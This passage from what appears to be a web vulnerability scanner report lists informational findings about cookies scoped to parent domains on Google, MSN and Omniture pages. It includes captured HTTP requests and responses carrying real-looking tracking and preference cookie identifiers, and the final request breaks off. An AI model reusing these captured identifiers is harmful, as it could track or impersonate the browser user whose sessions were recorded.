__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
datr=8CJHTYhjyotVYfKpZ5B35lnF; expires=Sat, 02-Feb-2013 04:18:45 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.339. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=we HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

11.340. http://www.google.com/setprefs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/setprefs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:LD=en:TM=1293845297:LM=1296661892:GM=1:SG=2:S=R2c15B476pm3H2IR; expires=Fri, 01-Feb-2013 15:51:32 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /setprefs?sig=0_wmOEOqCEugI_DX4CRMM9-gOiSPQ=&suggon=2&prev=http://www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmillenium%2Bboston HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 302 Found
Location: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=millenium+boston
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:LD=en:TM=1293845297:LM=1296661892:GM=1:SG=2:S=R2c15B476pm3H2IR; expires=Fri, 01-Feb-2013 15:51:32 GMT; path=/; domain=.google.com
Date: Wed, 02 Feb 2011 15:51:32 GMT
Server: gws
Content-Length: 277
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/search?sou
...[SNIP]...

11.341. http://www.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; domain=msn.com; expires=Wed, 16-Feb-2011 16:03:22 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=W:default&PM=z:1 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://www.msn.com/
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; stvx=gendermodule:forher

Response

11.342. http://www.omniture.com/de previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/de

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:52:35 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /de HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:52:35 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:52:35 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:52:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cms_site_lang=2; expires=Sat, 05-Mar-2011 05:52:35 GMT; path=/; domain=omniture.com
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:52:35 GMT; path=/; domain=omniture.com
Content-Length: 37600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//de" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="de" lang="de">
<head>
<title>Webanalyse | Software zur Optim
...[SNIP]...

11.343. http://www.omniture.com/en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:51:49 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:51:49 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:51:49 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:51:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:51:49 GMT; path=/; domain=omniture.com
Content-Length: 43417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Online Marketing Suite po
...[SNIP]...

11.344. http://www.omniture.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 15:39:36 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/ HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_omniture=84542986.5892.0000; omniture_unique=c4b47f0affb47cea2cd263f6285f016c; cms_site_lang=1; use207=7; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; s_cid=natural_bookmark; mbox=check#true#1296661288|session#1296661217505-786518#1296663078|PC#1296661217505-786518.17#1299080421; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 15:39:36 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 15:39:36 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 15:39:36 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 15:39:36 GMT; path=/; domain=omniture.com
Content-Length: 43418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Online Marketing Suite po
...[SNIP]...

11.345. http://www.omniture.com/en/community previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/community

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:12:00 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/community HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:12:00 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:12:00 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:12:00 GMT
Content-Length: 22345
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:12:00 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Community | Online Business Opt
...[SNIP]...

11.346. http://www.omniture.com/en/community/blogs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/community/blogs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:13:08 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/community/blogs HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:13:08 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:13:08 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:13:08 GMT
Content-Length: 29155
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:13:08 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Web Analytics | Online Business
...[SNIP]...

11.347. http://www.omniture.com/en/community/events previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/community/events

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:13:29 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/community/events HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:13:29 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:13:29 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:13:29 GMT
Content-Length: 21439
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:13:29 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Resources | Events</
...[SNIP]...

11.348. http://www.omniture.com/en/community/usergroups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/community/usergroups

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:13:44 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/community/usergroups HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:13:44 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:13:44 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:13:44 GMT
Content-Length: 22243
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:13:44 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>User Groups | Omniture Communit
...[SNIP]...

11.349. http://www.omniture.com/en/company/adobe_faq previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/adobe_faq

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:38:35 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/company/adobe_faq HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:38:35 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:38:35 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:38:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:38:35 GMT; path=/; domain=omniture.com
Content-Length: 39899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Company | Acquisitio
...[SNIP]...

11.350. http://www.omniture.com/en/company/analyst_insight previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/analyst_insight

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:43:05 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/company/analyst_insight HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:43:05 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:43:05 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:43:06 GMT
Content-Length: 24661
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:43:05 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Analyst Insight on SiteCatalyst
...[SNIP]...

11.351. http://www.omniture.com/en/company/customers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/customers

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:40:15 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/company/customers HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:40:15 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:40:15 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:40:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:40:15 GMT; path=/; domain=omniture.com
Content-Length: 36431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Customer Showcase | Online Busi
...[SNIP]...

11.352. http://www.omniture.com/en/company/press_room previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:39:21 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/company/press_room HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
